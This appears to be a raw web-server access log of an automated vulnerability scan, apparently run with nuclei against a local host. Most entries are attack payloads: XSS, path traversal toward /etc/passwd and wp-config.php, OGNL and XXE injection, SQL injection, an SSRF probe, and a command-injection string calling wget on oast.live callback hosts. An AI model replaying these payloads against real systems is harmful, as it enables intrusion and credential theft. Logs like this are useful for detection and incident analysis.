+{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/development.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.320","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hm/login.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.800","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/28fHqS7FVRSmMLdEsVJ5cuqLCqp/)%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.648","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/multimon.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.648","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.928","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/41 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.378","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.978","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /logs/development.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.248","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.252","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"payload=<%3fxml+version%3d\x221.0\x22+%3f>%25xxe%3b]>","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.251","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.251","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.403","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/42 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /net/net/net.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ui/PWResetUserValidation HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.001","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.754","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.751","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.261","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"cat_id=4'&get_seleted_Category=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /homeaction.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.307","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c9oms3gsmpve1ijt0mc0bhps5j7skqpjp.oast.live%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c9oms3gsmpve1ijt0mc03druae6asw9iy.oast.live%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.017","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.961","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/43 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.252","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.383","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.250","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"6.291","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /development.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.411","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.628","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA